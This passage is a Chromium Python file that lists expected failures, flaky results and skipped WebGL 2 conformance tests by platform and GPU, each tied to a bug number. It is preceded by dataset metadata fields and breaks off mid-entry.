| 0.864933
| 0.842562
| 0.777405
| 0.763143
| 0.700224
| 0.687081
| 0
| 0.006585
| 0.152425
| 5,196
| 136
| 88
| 38.205882
| 0.805404
| 0
| 0
| 0.660377
| 0
| 0
| 0.278291
| 0.25154
| 0
| 0
| 0
| 0
| 0.056604
| 1
| 0.084906
| false
| 0.009434
| 0.018868
| 0
| 0.103774
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
97e626c62b6e43f607c4d64a05a7555888c680a0
| 55,888
|
py
|
Python
|
src/content/test/gpu/gpu_tests/webgl2_conformance_expectations.py
|
yang-guangliang/osv-free
|
b81fee48bc8898fdc641a2e3c227957ed7e6445e
|
[
"Apache-2.0"
] | 2
|
2021-05-24T13:52:28.000Z
|
2021-05-24T13:53:10.000Z
|
src/content/test/gpu/gpu_tests/webgl2_conformance_expectations.py
|
yang-guangliang/osv-free
|
b81fee48bc8898fdc641a2e3c227957ed7e6445e
|
[
"Apache-2.0"
] | null | null | null |
src/content/test/gpu/gpu_tests/webgl2_conformance_expectations.py
|
yang-guangliang/osv-free
|
b81fee48bc8898fdc641a2e3c227957ed7e6445e
|
[
"Apache-2.0"
] | 3
|
2018-03-12T07:58:10.000Z
|
2019-08-31T04:53:58.000Z
|
# Copyright (c) 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from gpu_tests.webgl_conformance_expectations import WebGLConformanceExpectations
# See the GpuTestExpectations class for documentation.
class WebGL2ConformanceExpectations(WebGLConformanceExpectations):
def __init__(self, conformance_path, url_prefixes=None, is_asan=False):
super(WebGL2ConformanceExpectations, self).__init__(
conformance_path, url_prefixes=url_prefixes, is_asan=is_asan)
def SetExpectations(self):
# ===================================
# Extension availability expectations
# ===================================
# It's expected that not all extensions will be available on all platforms.
# Having a test listed here is not necessarily a problem.
# Skip these, rather than expect them to fail, to speed up test
# execution. The browser is restarted even after expected test
# failures.
self.Skip('WebglExtension_WEBGL_compressed_texture_astc',
['win', 'mac', 'linux'])
self.Skip('WebglExtension_WEBGL_compressed_texture_atc',
['win', 'mac', 'linux'])
self.Skip('WebglExtension_WEBGL_compressed_texture_etc',
['win', 'mac', 'linux'])
self.Skip('WebglExtension_WEBGL_compressed_texture_etc1',
['win', 'mac', 'linux'])
self.Skip('WebglExtension_WEBGL_compressed_texture_pvrtc',
['win', 'mac', 'linux'])
self.Skip('WebglExtension_WEBGL_compressed_texture_s3tc_srgb',
['win', 'mac', 'linux'])
# ========================
# Conformance expectations
# ========================
# Too slow (take about one hour to run)
self.Skip('deqp/functional/gles3/builtinprecision/*.html', bug=619403)
# All platforms.
self.Flaky('conformance2/query/occlusion-query.html', bug=603168)
self.Fail('conformance2/glsl3/tricky-loop-conditions.html', bug=483282)
self.Fail('conformance2/rendering/depth-stencil-feedback-loop.html',
bug=660844) # WebGL 2.0.1
self.Fail('conformance2/rendering/rendering-sampling-feedback-loop.html',
bug=660844) # WebGL 2.0.1
self.Fail('conformance2/textures/misc/' +
'integer-cubemap-specification-order-bug.html',
bug=483282) # owner:cwallez, test might be buggy
self.Fail('conformance/textures/misc/tex-sub-image-2d-bad-args.html',
bug=625738)
self.Fail('conformance/glsl/misc/uninitialized-local-global-variables.html',
bug=1966) # angle bug ID
self.Fail('conformance2/glsl3/uninitialized-local-global-variables.html',
bug=1966) # angle bug ID
# Windows only.
self.Fail('conformance2/rendering/blitframebuffer-outside-readbuffer.html',
['win', 'd3d11'], bug=644740)
self.Fail('conformance2/textures/misc/tex-base-level-bug.html',
['win', 'd3d11'], bug=705865)
# Win / NVidia
self.Flaky('deqp/functional/gles3/fbomultisample*',
['win', 'nvidia', 'd3d11'], bug=631317)
self.Fail('conformance2/rendering/' +
'draw-with-integer-texture-base-level.html',
['win', 'nvidia', 'd3d11'], bug=679639)
# Win10 / NVIDIA Quadro P400 / D3D11 flaky failures
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_interleaved_lines.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_interleaved_triangles.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_separate_lines.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_separate_triangles.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_interleaved_lines.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_interleaved_triangles.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_separate_lines.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_separate_triangles.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Fail('deqp/functional/gles3/transformfeedback/interpolation_flat.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=680754)
self.Flaky('conformance/textures/image_bitmap_from_video/' +
'tex-2d-rgba-rgba-unsigned_short_5_5_5_1.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=728670)
self.Flaky('conformance/textures/image_bitmap_from_video/' +
'tex-2d-rgba-rgba-unsigned_short_4_4_4_4.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=728670)
self.Flaky('conformance2/textures/video/*',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=728670)
self.Flaky('conformance2/textures/image_bitmap_from_video/*',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=728670)
self.Flaky('conformance/extensions/oes-texture-half-float-with-video.html',
['win10', ('nvidia', 0x1cb3), 'd3d11'], bug=728670)
# Win / NVIDIA / OpenGL
self.Fail('conformance2/glsl3/vector-dynamic-indexing-nv-driver-bug.html',
['win', 'nvidia', 'opengl'], bug=693090)
self.Fail('conformance2/glsl3/' +
'vector-dynamic-indexing-swizzled-lvalue.html',
['win', 'nvidia', 'opengl'], bug=709874)
# Win / AMD
self.Fail('conformance2/rendering/blitframebuffer-stencil-only.html',
['win', 'amd', 'd3d11'], bug=483282) # owner:jmadill
# Keep a separate set of failures for the R7 240, since it can use a new
# and updated driver. The older drivers won't ever get fixes from AMD.
# Use ['win', ('amd', 0x6613)] for the R7 240 devices.
# Have seen this time out. Think it may be because it's currently
# the first test that runs in the shard, and the browser might not
# be coming up correctly.
self.Flaky('deqp/functional/gles3/multisample.html',
['win', ('amd', 0x6613)], bug=687374)
# Win / Intel
self.Fail('conformance2/glsl3/' +
'texture-offset-uniform-texture-coordinate.html',
['win', 'intel', 'd3d11'], bug=662644) # WebGL 2.0.1
self.Skip('conformance2/textures/misc/copy-texture-image.html',
['win', 'intel', 'd3d11'], bug=617449)
# Seems to cause the harness to fail immediately afterward
self.Skip('conformance2/textures/video/tex-2d-rgba16f-rgba-half_float.html',
['win', 'intel', 'd3d11'], bug=648337)
self.Flaky('deqp/functional/gles3/lifetime.html',
['win', 'intel', 'd3d11'], bug=620379)
self.Skip('deqp/functional/gles3/texturespecification/' +
'teximage3d_depth_pbo.html',
['win', 'intel', 'd3d11'], bug=617449)
self.Flaky('deqp/functional/gles3/textureformat/unsized_3d.html',
['win', 'intel', 'd3d11'], bug=614418)
# These tests seem to crash flakily. It's best to leave them as skip
# until we can run them without GPU hangs and crashes.
self.Skip('deqp/functional/gles3/textureshadow/2d_array_*.html',
['win', 'intel', 'd3d11'], bug=666392)
# Win 10 / Intel
self.Fail('deqp/functional/gles3/fbocolorbuffer/clear.html',
['win10', 'intel', 'd3d11', 'no_passthrough'], bug=483282)
# Intel HD 530
self.Fail('conformance2/textures/misc/angle-stuck-depth-textures.html',
['win', 'intel', 'd3d11'], bug=680797)
self.Fail('deqp/functional/gles3/fboinvalidate/format_00.html',
['win', 'intel', 'd3d11'], bug=680797)
self.Fail('deqp/functional/gles3/fboinvalidate/format_01.html',
['win', 'intel', 'd3d11'], bug=680797)
self.Fail('deqp/functional/gles3/fboinvalidate/format_02.html',
['win', 'intel', 'd3d11'], bug=680797)
self.Fail('deqp/functional/gles3/framebufferblit/' +
'default_framebuffer_03.html',
['win', 'intel', 'd3d11'], bug=680797)
self.Fail('deqp/functional/gles3/framebufferblit/' +
'default_framebuffer_04.html',
['win', 'intel', 'd3d11'], bug=680797)
self.Fail('deqp/functional/gles3/framebufferblit/' +
'default_framebuffer_06.html',
['win', 'intel', 'd3d11'], bug=680797)
# It's unfortunate that these suppressions need to be so broad, but it
# looks like the D3D11 device can be lost spontaneously on this
# configuration while running basically any test.
self.Flaky('conformance/*', ['win', 'intel', 'd3d11'], bug=628395)
self.Flaky('conformance2/*', ['win', 'intel', 'd3d11'], bug=628395)
self.Flaky('deqp/*', ['win', 'intel', 'd3d11'], bug=628395)
# Passthrough command decoder / D3D11
self.Fail('conformance/textures/image_bitmap_from_video/*',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance/textures/video/*',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance/textures/misc/texture-corner-case-videos.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_video/*',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/video/*',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/glsl3/no-attribute-vertex-shader.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/rendering/clearbuffer-sub-source.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas/tex-2d-rg8-rg-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas/tex-2d-rg16f-rg-half_float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas/tex-2d-rg16f-rg-float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas/tex-2d-rg32f-rg-float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas/' +
'tex-2d-rg8ui-rg_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas/' +
'tex-2d-rgb8ui-rgb_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas/' +
'tex-2d-rgba8ui-rgba_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rg8-rg-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rg16f-rg-half_float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rg16f-rg-float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rg32f-rg-float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rg8ui-rg_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rgb8ui-rgb_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rgba8ui-rgba_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rg8-rg-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rg16f-rg-half_float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rg16f-rg-float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rg32f-rg-float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rg8ui-rg_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rgb8ui-rgb_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rgba8ui-rgba_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-rg8-rg-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-rg16f-rg-half_float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-rg16f-rg-float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-rg32f-rg-float.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-rg8ui-rg_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-srgb8-rgb-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-rgb8ui-rgb_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-srgb8_alpha8-rgba-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-2d-rgba8ui-rgba_integer-unsigned_byte.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance/glsl/misc/shaders-with-name-conflicts.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/data/gles3/shaders/preprocessor.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/reading/read-pixels-from-fbo-test.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Skip('conformance2/textures/misc/' +
'copy-texture-image-webgl-specific.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Skip('conformance2/reading/read-pixels-pack-parameters.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Skip('conformance2/reading/read-pixels-into-pixel-pack-buffer.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/reading/format-r11f-g11f-b10f.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance2/textures/misc/' +
'tex-image-with-bad-args-from-dom-elements.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance/misc/uninitialized-test.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance/reading/read-pixels-test.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('conformance/textures/misc/copy-tex-image-and-sub-image-2d.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/fbocolorbuffer/clear.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/fboinvalidate/sub.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/shaderbuiltinvar.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/framebufferblit/' +
'default_framebuffer_*.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/instancedrendering.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/integerstatequery.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/readpixel.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/shaderderivate_dfdx.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/shaderderivate_dfdy.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/shaderderivate_fwidth.html',
['win', 'passthrough', 'd3d11'], bug=602688)
self.Fail('deqp/functional/gles3/shaderstruct.html',
['win', 'passthrough', 'd3d11'], bug=602688)
# Mac only.
# Regressions in 10.12.4.
self.Fail('conformance2/textures/misc/tex-base-level-bug.html',
['sierra'], bug=705865)
self.Fail('conformance2/textures/misc/tex-mipmap-levels.html',
['sierra'], bug=705865)
# Fails on multiple GPU types.
self.Fail('conformance2/glsl3/vector-dynamic-indexing-swizzled-lvalue.html',
['mac'], bug=709351)
self.Fail('conformance2/rendering/' +
'framebuffer-completeness-unaffected.html',
['mac', 'nvidia', 'intel'], bug=630800)
self.Fail('deqp/functional/gles3/fbocompleteness.html',
['mac', 'nvidia', 'intel'], bug=630800)
# Mac Retina NVIDIA
self.Fail('deqp/functional/gles3/fbomultisample*',
['mac', ('nvidia', 0xfe9)], bug=641209)
self.Fail('deqp/functional/gles3/framebufferblit/' +
'default_framebuffer_04.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('conformance/attribs/gl-disabled-vertex-attrib.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Flaky(
'conformance/extensions/webgl-compressed-texture-size-limit.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('conformance/programs/' +
'gl-bind-attrib-location-long-names-test.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('conformance/programs/gl-bind-attrib-location-test.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('conformance2/glsl3/loops-with-side-effects.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('conformance2/textures/misc/tex-input-validation.html',
['mac', ('nvidia', 0xfe9), 'no_angle'], bug=483282)
self.Flaky('conformance2/textures/image_bitmap_from_video/' +
'tex-2d-rgba16f-rgba-half_float.html',
['mac', ('nvidia', 0xfe9)], bug=682834)
self.Fail('deqp/functional/gles3/draw/random.html',
['sierra', ('nvidia', 0xfe9)], bug=716652)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_04.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_07.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_08.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_10.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_11.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_12.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_13.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_18.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_25.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_29.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_32.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_34.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/pixelbufferobject.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/negativevertexarrayapi.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/shaderindexing/varying.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_pbo_2d_00.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_pbo_2d_01.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage2d_pbo_2d_00.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage2d_pbo_2d_01.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage2d_pbo_cube_00.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage2d_pbo_cube_01.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage2d_pbo_cube_02.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage2d_pbo_cube_03.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage2d_pbo_cube_04.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage3d_pbo_2d_array_00.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage3d_pbo_2d_array_01.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage3d_pbo_3d_00.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage3d_pbo_3d_01.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage3d_pbo_3d_00.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texsubimage3d_pbo_3d_01.html',
['mac', ('nvidia', 0xfe9)], bug=614174)
self.Fail('deqp/functional/gles3/fragmentoutput/array.fixed.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fragmentoutput/basic.fixed.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fragmentoutput/random_00.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fragmentoutput/random_01.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fragmentoutput/random_02.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fbocolorbuffer/clear.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fbocolorbuffer/tex2d_05.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fbocolorbuffer/tex2darray_05.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fbocolorbuffer/tex3d_05.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fbocolorbuffer/texcube_05.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fbocolorbuffer/blend.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/draw/draw_arrays.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/draw/draw_arrays_instanced.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/draw/draw_elements.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/draw/draw_elements_instanced.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/draw/draw_range_elements.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/fboinvalidate/format_02.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/negativeshaderapi.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Flaky('deqp/functional/gles3/vertexarrays/' +
'multiple_attributes.output.html',
['mac', ('nvidia', 0xfe9)], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_28.html',
['mac', ('nvidia', 0xfe9)], bug=654187)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_30.html',
['mac', ('nvidia', 0xfe9)], bug=654187)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_31.html',
['mac', ('nvidia', 0xfe9)], bug=654187)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_33.html',
['mac', ('nvidia', 0xfe9)], bug=654187)
# Mac AMD
self.Fail('deqp/functional/gles3/transformfeedback/' +
'array_interleaved_lines.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'array_interleaved_points.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'array_interleaved_triangles.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'array_separate_lines.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'array_separate_points.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'array_separate_triangles.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_interleaved_lines.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_interleaved_points.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_interleaved_triangles.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_separate_lines.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_separate_points.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'basic_types_separate_triangles.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'interpolation_centroid.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'interpolation_flat.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'interpolation_smooth.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'point_size.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'position.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_interleaved_lines.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_interleaved_points.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_interleaved_triangles.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_separate_lines.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_separate_points.html',
['mac', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/' +
'random_separate_triangles.html',
['mac', 'amd'], bug=483282)
self.Flaky('deqp/functional/gles3/shaderoperator/common_functions.html',
['mac', 'amd'], bug=702336)
self.Flaky('deqp/functional/gles3/shaderindexing/mat_01.html',
['mac', 'amd'], bug=636648)
self.Flaky('deqp/functional/gles3/shaderindexing/mat_02.html',
['mac', 'amd'], bug=644360)
# These seem to be provoking intermittent GPU process crashes on
# the MacBook Pros with AMD GPUs.
self.Flaky('deqp/functional/gles3/texturefiltering/*',
['mac', 'amd'], bug=663601)
self.Flaky('deqp/functional/gles3/textureshadow/*',
['mac', 'amd'], bug=663601)
self.Flaky('deqp/functional/gles3/texturespecification/' +
'teximage2d_unpack_params.html',
['mac', 'amd'], bug=679058)
self.Fail('conformance2/rendering/clipping-wide-points.html',
['mac', 'amd'], bug=642822)
# Mac Pro with AMD GPU
self.Flaky('deqp/functional/gles3/shaderindexing/tmp.html',
['mac', ('amd', 0x679e)], bug=659871)
# Mac Intel
# Regressions in 10.12.4 on Haswell GPUs.
self.Fail('deqp/functional/gles3/fbocolorbuffer/tex2d_00.html',
['mac', ('intel', 0x0a2e)], bug=718194)
self.Fail('deqp/functional/gles3/fboinvalidate/format_00.html',
['mac', ('intel', 0x0a2e)], bug=718194)
self.Fail('deqp/functional/gles3/framebufferblit/' +
'default_framebuffer_05.html',
['mac', ('intel', 0x0a2e)], bug=718194)
self.Fail('conformance2/rendering/framebuffer-texture-level1.html',
['mac', 'intel'], bug=680278)
self.Fail('conformance2/textures/misc/angle-stuck-depth-textures.html',
['mac', 'intel'], bug=679692)
self.Fail('deqp/functional/gles3/fbomultisample*',
